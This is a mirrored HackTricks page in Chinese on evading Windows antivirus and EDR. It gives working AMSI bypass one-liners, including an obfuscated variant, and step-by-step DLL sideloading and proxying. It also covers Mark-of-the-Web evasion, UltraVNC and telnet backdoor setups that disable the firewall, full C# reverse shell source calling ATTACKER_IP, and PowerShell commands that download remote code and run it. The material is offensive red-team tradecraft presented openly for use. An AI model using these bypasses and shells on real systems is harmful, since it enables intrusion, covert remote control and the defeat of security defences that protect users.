Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/av-bypass.md

32 KiB
Raw Blame History

杀毒软件AV绕过

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

支持HackTricks的其他方式

本页由 @m2rc_p编写!

AV逃避方法论

目前AV使用不同的方法来检查文件是否恶意包括静态检测、动态分析以及更高级的EDR中的行为分析。

静态检测

静态检测通过在二进制文件或脚本中标记已知的恶意字符串或字节数组,并从文件本身提取信息(例如文件描述、公司名称、数字签名、图标、校验和等)来实现。这意味着使用已知的公共工具可能更容易被发现,因为它们可能已经被分析并标记为恶意。有几种方法可以绕过这种检测:

  • 加密

如果加密二进制文件则AV无法检测到您的程序但您需要某种加载程序来解密并在内存中运行程序。

  • 混淆

有时您只需要更改二进制文件或脚本中的一些字符串就可以使其通过AV但这可能是一项耗时的任务具体取决于您尝试混淆的内容。

  • 自定义工具

如果开发自己的工具,则不会有已知的恶意签名,但这需要大量时间和精力。

{% hint style="info" %} 检查Windows Defender静态检测的一个好方法是使用ThreatCheck。它基本上将文件分成多个段然后要求Defender逐个扫描每个段这样它可以准确告诉您在您的二进制文件中有哪些被标记的字符串或字节。 {% endhint %}

我强烈建议您查看这个关于实际AV逃避的YouTube播放列表

动态分析

动态分析是指AV在沙箱中运行您的二进制文件并监视恶意活动例如尝试解密并读取浏览器密码对LSASS执行minidump等。这部分可能会更加棘手但以下是一些可以用来逃避沙箱的方法。

  • 执行前休眠 根据实现方式这可能是绕过AV动态分析的好方法。AV有很短的时间来扫描文件以免打断用户的工作流程因此使用长时间的休眠可能会干扰二进制文件的分析。问题在于许多AV沙箱可能会根据实现方式跳过休眠。
  • 检查机器资源 通常,沙箱的资源非常有限(例如<2GB RAM否则可能会减慢用户的机器。您还可以在这里非常有创意例如通过检查CPU温度甚至风扇转速不是所有内容都会在沙箱中实现。
  • 特定于机器的检查 如果您想针对加入“contoso.local”域的工作站用户进行定位可以检查计算机的域看看是否与您指定的域匹配如果不匹配则可以使您的程序退出。

事实证明Microsoft Defender的沙箱计算机名是HAL9TH因此您可以在引爆前检查恶意软件中的计算机名如果名称与HAL9TH匹配则意味着您在Defender的沙箱中因此可以使您的程序退出。

来源:https://youtu.be/StSLxFbVz0M?t=1439

@mgeeky提供的其他针对沙箱的一些建议

Red Team VX Discord #malware-dev频道

正如我们在本文中之前所说,公共工具最终将被检测到,因此,您应该问自己一个问题:

例如如果您想转储LSASS您真的需要使用mimikatz或者您可以使用一个不太知名但也可以转储LSASS的项目。

正确答案可能是后者。以mimikatz为例它可能是AV和EDR中最被标记的恶意软件之一虽然项目本身非常酷但要绕过AV与其使用它还不如寻找您尝试实现的目标的替代方案。

{% hint style="info" %} 在修改用于逃避的有效负载时请确保在defender中关闭自动样本提交,并且,请认真对待,不要将其上传到VIRUSTOTAL如果您的目标是长期实现逃避。如果要检查特定AV是否检测到您的有效负载请在虚拟机上安装它尝试关闭自动样本提交并在那里进行测试直到您对结果满意为止。 {% endhint %}

EXE与DLL

在可能的情况下,始终优先使用DLL进行逃避根据我的经验DLL文件通常检测和分析要少得多因此这是一个非常简单的技巧可用于在某些情况下避免检测如果您的有效负载有某种方式作为DLL运行

正如我们在这张图片中看到的Havoc的DLL有效负载在antiscan.me中的检测率为4/26而EXE有效负载的检测率为7/26。

antiscan.me对比普通Havoc EXE有效负载与普通Havoc DLL的检测率

现在我们将展示一些您可以使用DLL文件的技巧使其更加隐蔽。

DLL 旁路加载 & 代理

DLL 旁路加载 利用加载程序使用的 DLL 搜索顺序,通过将受害应用程序和恶意载荷放置在一起来实现。

您可以使用 Siofra 和以下 PowerShell 脚本检查易受 DLL 旁路加载攻击的程序:

{% code overflow="wrap" %}

Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name| ForEach-Object {
$binarytoCheck = "C:\Program Files\" + $_
C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f $binarytoCheck
}

{% endcode %}

这个命令将输出在"C:\Program Files\"目录下易受DLL劫持影响的程序列表以及它们尝试加载的DLL文件。

我强烈建议你自己探索DLL劫持/侧载程序这种技术如果做得很隐蔽是相当有效的但如果你使用公开已知的DLL侧载程序可能会很容易被发现。

仅仅通过放置一个恶意DLL并命名为程序期望加载的DLL并不会加载你的有效负载因为程序期望在该DLL中有一些特定的函数为了解决这个问题我们将使用另一种称为DLL代理/转发的技术。

DLL代理将程序从代理和恶意DLL发出的调用转发到原始DLL从而保留程序的功能并能够处理执行你的有效负载。

我将使用@flangvikSharpDLLProxy项目。

以下是我遵循的步骤:

1. Find an application vulnerable to DLL Sideloading (siofra or using Process Hacker)
2. Generate some shellcode (I used Havoc C2)
3. (Optional) Encode your shellcode using Shikata Ga Nai (https://github.com/EgeBalci/sgn)
4. Use SharpDLLProxy to create the proxy dll (.\SharpDllProxy.exe --dll .\mimeTools.dll --payload .\demon.bin)

{% endcode %}

最后一个命令会给我们2个文件一个DLL源代码模板和原始重命名的DLL。

{% code overflow="wrap" %}

5. Create a new visual studio project (C++ DLL), paste the code generated by SharpDLLProxy (Under output_dllname/dllname_pragma.c) and compile. Now you should have a proxy dll which will load the shellcode you've specified and also forward any calls to the original DLL.

{% endcode %}

这些是结果:

我们的 shellcode使用 SGN 编码)和代理 DLL 在 antiscan.me 中都有 0/26 的检测率!我会称之为成功。

{% hint style="info" %} 我强烈建议您观看 S3cur3Th1sSh1t 的 twitch VOD 关于 DLL Sideloading 以及 ippsec 的视频 以更深入地了解我们讨论的内容。 {% endhint %}

Freeze

Freeze 是一个绕过 EDRs 的 payload 工具包,使用挂起进程、直接系统调用和替代执行方法

您可以使用 Freeze 以隐秘的方式加载和执行您的 shellcode。

Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
2. ./Freeze -I demon.bin -encrypt -O demon.exe
3. Profit, no alerts from defender

{% hint style="info" %} 逃避检测只是一场猫鼠游戏,今天有效的方法明天可能被发现,因此永远不要只依赖一个工具,如果可能的话,尝试链接多种逃避技术。 {% endhint %}

AMSI反恶意软件扫描接口

AMSI旨在防止“无文件恶意软件”。最初,防病毒软件只能扫描磁盘上的文件,因此,如果您以某种方式直接在内存中执行载荷,防病毒软件无法阻止它,因为它没有足够的可见性。

AMSI功能已集成到Windows的以下组件中。

  • 用户帐户控制UAC提升EXE、COM、MSI或ActiveX安装
  • PowerShell脚本、交互式使用和动态代码评估
  • Windows脚本宿主wscript.exe和cscript.exe
  • JavaScript和VBScript
  • Office VBA宏

它允许防病毒解决方案检查脚本行为,通过以未加密和未混淆的形式公开脚本内容。

运行IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')将在Windows Defender上产生以下警报。

请注意,它在路径之前加上amsi:然后是脚本运行的可执行文件的路径本例中为powershell.exe

我们没有将任何文件写入磁盘但由于AMSI的存在仍然在内存中被捕获。

有几种方法可以规避AMSI

  • 混淆

由于AMSI主要用于静态检测因此修改您尝试加载的脚本可能是规避检测的好方法。

但是即使脚本有多个层AMSI也有解混淆脚本的能力因此取决于如何执行混淆可能不是一个好选择。这使得规避并不是那么直截了当。尽管如此有时候您只需要更改几个变量名就可以避免被检测因此这取决于某些内容被标记的程度。

  • AMSI绕过

由于AMSI是通过将DLL加载到powershell也包括cscript.exe、wscript.exe等进程中实现的因此即使作为非特权用户运行也可以轻松篡改它。由于AMSI实现中存在这个缺陷研究人员已经找到了多种规避AMSI扫描的方法。

强制错误

强制AMSI初始化失败amsiInitFailed将导致当前进程不会启动任何扫描。最初由Matt Graeber披露,微软已经开发了一个签名来防止更广泛的使用。

{% code overflow="wrap" %}

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

{% endcode %}

只需要一行PowerShell代码就可以使AMSI对当前PowerShell进程无效。当然这行代码已经被AMSI本身标记因此需要进行一些修改才能使用这种技术。

这是我从这个Github Gist中获取的修改后的AMSI绕过方法。

Try{#Ams1 bypass technic nº 2
$Xdatabase = 'Utils';$Homedrive = 'si'
$ComponentDeviceId = "N`onP" + "ubl`ic" -join ''
$DiskMgr = 'Syst+@.M£n£g' + 'e@+nt.Auto@' + '£tion.A' -join ''
$fdx = '@ms' + '£In£' + 'tF@£' + 'l+d' -Join '';Start-Sleep -Milliseconds 300
$CleanUp = $DiskMgr.Replace('@','m').Replace('£','a').Replace('+','e')
$Rawdata = $fdx.Replace('@','a').Replace('£','i').Replace('+','e')
$SDcleanup = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $CleanUp,$Homedrive,$Xdatabase))
$Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}

内存补丁

这种技术最初是由@RastaMouse发现的它涉及查找amsi.dll中“AmsiScanBuffer”函数的地址负责扫描用户提供的输入并用指令覆盖它以返回E_INVALIDARG代码这样实际扫描的结果将返回0被解释为干净的结果。

{% hint style="info" %} 请阅读https://rastamouse.me/memory-patching-amsi-bypass/以获取更详细的解释。 {% endhint %}

还有许多其他用于绕过PowerShell的AMSI的技术请查看此页面此存储库以了解更多信息。

混淆

有几种工具可用于混淆C#明文代码,生成元编程模板以编译二进制文件或混淆已编译的二进制文件,例如:

  • InvisibilityCloakC#混淆器
  • Obfuscator-LLVM:该项目的目标是提供LLVM编译套件的开源分支,能够通过代码混淆和防篡改提供增强软件安全性。
  • ADVobfuscatorADVobfuscator演示了如何使用C++11/14语言在编译时生成混淆代码,而不使用任何外部工具并且不修改编译器。
  • obfy通过C++模板元编程框架生成一层混淆操作,使想要破解应用程序的人的生活变得更加困难。
  • Alcatraz**Alcatraz是一种x64二进制混淆器能够混淆各种不同的pe文件包括.exe、.dll、.sys
  • metameMetame是一个用于任意可执行文件的简单变形代码引擎。
  • ropfuscatorROPfuscator是一个针对LLVM支持的语言使用ROP返回导向编程的细粒度代码混淆框架。ROPfuscator通过将常规指令转换为ROP链来在汇编代码级别混淆程序从而扰乱我们对正常控制流的自然概念。
  • NimcryptNimcrypt是一个用Nim编写的.NET PE加密器。
  • inceptor**Inceptor能够将现有的EXE/DLL转换为shellcode然后加载它们。

SmartScreen和MoTW

当从互联网下载并执行一些可执行文件时,您可能会看到这个屏幕。

Microsoft Defender SmartScreen是一种旨在保护最终用户免受运行潜在恶意应用程序的安全机制。

SmartScreen主要采用基于声誉的方法意味着不常见的下载应用程序将触发SmartScreen从而警告并阻止最终用户执行文件尽管仍可以通过单击更多信息 -> 仍然运行来执行文件)。

MoTWMark of The Web是一个带有Zone.Identifier名称的NTFS备用数据流在从互联网下载文件时会自动创建以及它被下载的URL。

检查从互联网下载的文件的Zone.Identifier ADS。

{% hint style="info" %} 重要提示:使用受信任签名证书签名的可执行文件不会触发SmartScreen。 {% endhint %}

防止您的有效负载获得Mark of The Web的一种非常有效的方法是将它们打包到某种容器中比如ISO。这是因为Mark-of-the-WebMOTW无法应用于非NTFS卷。

PackMyPayload是一个将有效负载打包到输出容器中以规避Mark-of-the-Web的工具。

示例用法:

PS C:\Tools\PackMyPayload> python .\PackMyPayload.py .\TotallyLegitApp.exe container.iso

+      o     +              o   +      o     +              o
+             o     +           +             o     +         +
o  +           +        +           o  +           +          o
-_-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-_-_-_-_-_-_-_,------,      o
:: PACK MY PAYLOAD (1.1.0)       -_-_-_-_-_-_-|   /\_/\
for all your container cravings   -_-_-_-_-_-~|__( ^ .^)  +    +
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-__-_-_-_-_-_-_-''  ''
+      o         o   +       o       +      o         o   +       o
+      o            +      o    ~   Mariusz Banach / mgeeky    o
o      ~     +           ~          <mb [at] binary-offensive.com>
o           +                         o           +           +

[.] Packaging input file to output .iso (iso)...
Burning file onto ISO:
Adding file: /TotallyLegitApp.exe

[+] Generated file written to (size: 3420160): container.iso

以下是使用PackMyPayload将有效负载打包在ISO文件中绕过SmartScreen的演示。

C#程序集反射

将C#二进制文件加载到内存中已经为人所知已久,仍然是一种非常好的方法,可以在运行后渗透工具时避免被杀毒软件发现。

由于有效负载将直接加载到内存中而不会触及磁盘我们只需要担心为整个过程打补丁AMS。大多数C2框架如sliver、Covenant、metasploit、CobaltStrike、Havoc等已经提供了直接在内存中执行C#程序集的能力,但有不同的执行方式:

  • 分叉和运行

它涉及生成一个新的牺牲进程将您的后渗透恶意代码注入到该新进程中执行您的恶意代码完成后终止新进程。这种方法的好处和缺点都有。分叉和运行方法的好处在于执行发生在我们的Beacon植入进程之外。这意味着如果我们的后渗透操作出了问题或被发现,我们的植入物存活的机会大得多。缺点是您被行为检测发现的机会更大

  • 内联

这是将后渗透恶意代码注入到自己的进程中。这样您可以避免创建新进程并使其被杀毒软件扫描但缺点是如果执行有效负载时出现问题您的Beacon丢失的可能性大得多,因为它可能会崩溃。

{% hint style="info" %} 如果您想了解更多关于C#程序集加载的信息,请查看这篇文章https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/以及他们的InlineExecute-Assembly BOF (https://github.com/xforcered/InlineExecute-Assembly) {% endhint %}

您还可以从PowerShell加载C#程序集,请查看Invoke-SharpLoaderS3cur3th1sSh1t的视频

使用其他编程语言

https://github.com/deeexcee-io/LOI-Bins中提出的,通过让受损机器访问安装在攻击者控制的SMB共享上的解释器环境,可以使用其他语言执行恶意代码。

通过允许访问解释器二进制文件和SMB共享上的环境您可以在受损机器的内存中执行这些语言中的任意代码

该存储库指出Defender仍然会扫描脚本但通过利用Go、Java、PHP等我们有更多灵活性来绕过静态签名。在这些语言中使用随机未混淆的反向外壳脚本进行测试已被证明是成功的。

高级逃避

逃避是一个非常复杂的主题,有时您必须考虑一个系统中许多不同来源的遥测,因此在成熟的环境中完全不被检测到几乎是不可能的。

您对抗的每个环境都有其优势和劣势。

我强烈建议您观看@ATTL4S的这个演讲,以了解更多关于高级逃避技术的入门。

{% embed url="https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo" %}

这也是@mariuszbit关于深度逃避的另一个很棒的演讲。

{% embed url="https://www.youtube.com/watch?v=IbA7Ung39o4" %}

旧技术

检查Defender发现的恶意部分

您可以使用ThreatCheck,它将删除二进制文件的部分直到找出Defender发现为恶意的部分并将其拆分给您。
另一个执行相同操作的工具是avred,提供在https://avred.r00ted.ch/上的开放网络服务。

Telnet服务器

在Windows10之前所有Windows都带有一个Telnet服务器,您可以安装它(作为管理员)执行:

pkgmgr /iu:"TelnetServer" /quiet

让它在系统启动时启动,现在运行它:

sc config TlntSVR start= auto obj= localsystem

更改telnet端口(隐蔽)并禁用防火墙:

tlntadmn config port=80
netsh advfirewall set allprofiles state off

UltraVNC

从以下链接下载:http://www.uvnc.com/downloads/ultravnc.html(下载二进制文件,而不是安装程序)

在主机上:执行 winvnc.exe 并配置服务器:

  • 启用选项 Disable TrayIcon
  • VNC Password 中设置密码
  • View-Only Password 中设置密码

然后,将二进制文件 winvnc.exe新创建的文件 UltraVNC.ini 移动到受害者

反向连接

攻击者应该在主机内执行二进制文件 vncviewer.exe -listen 5900,这样它将准备好捕获反向VNC连接。然后,在受害者内:启动 winvnc 守护程序 winvnc.exe -run 并运行 winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900

**警告:**为了保持隐蔽,您必须避免做一些事情

  • 如果winvnc已经在运行,请不要启动它,否则会触发弹出窗口。使用tasklist | findstr winvnc检查是否正在运行
  • 不要在没有UltraVNC.ini的同一目录中启动winvnc,否则会导致配置窗口打开
  • 不要运行winvnc -h以获取帮助,否则会触发弹出窗口

GreatSCT

从以下链接下载:https://github.com/GreatSCT/GreatSCT

git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/setup/
./setup.sh
cd ..
./GreatSCT.py

在GreatSCT内部

use 1
list #Listing available payloads
use 9 #rev_tcp.py
set lhost 10.10.14.0
sel lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole

现在使用 msfconsole -r file.rc 启动 lister,然后执行以下 xml payload

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml

当前的防御程序会非常快速地终止该进程。

编译我们自己的反向 shell

https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

第一个 C# 反向 shell

使用以下命令进行编译:

c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt

使用方法:

back.exe <ATTACKER_IP> <PORT>

// From https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;


namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;

public static void Main(string[] args)
{
using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);

StringBuilder strInput = new StringBuilder();

Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();

while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}

private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();

if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}

}
}

使用编译器的C#

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt

REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066

REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639

自动下载和执行:

64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

{% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %}

C#混淆器列表: https://github.com/NotPrab/.NET-Obfuscator

C++

sudo apt-get install mingw-w64

i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

使用Python构建注入器示例

其他工具

# Veil Framework:
https://github.com/Veil-Framework/Veil

# Shellter
https://www.shellterproject.com/download/

# Sharpshooter
# https://github.com/mdsecactivebreach/SharpShooter
# Javascript Payload Stageless:
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

# Stageless HTA Payload:
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

# Staged VBS:
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

# Donut:
https://github.com/TheWover/donut

# Vulcan
https://github.com/praetorian-code/vulcan

更多

从零开始学习AWS黑客技术 htARTEHackTricks AWS红队专家

支持HackTricks的其他方式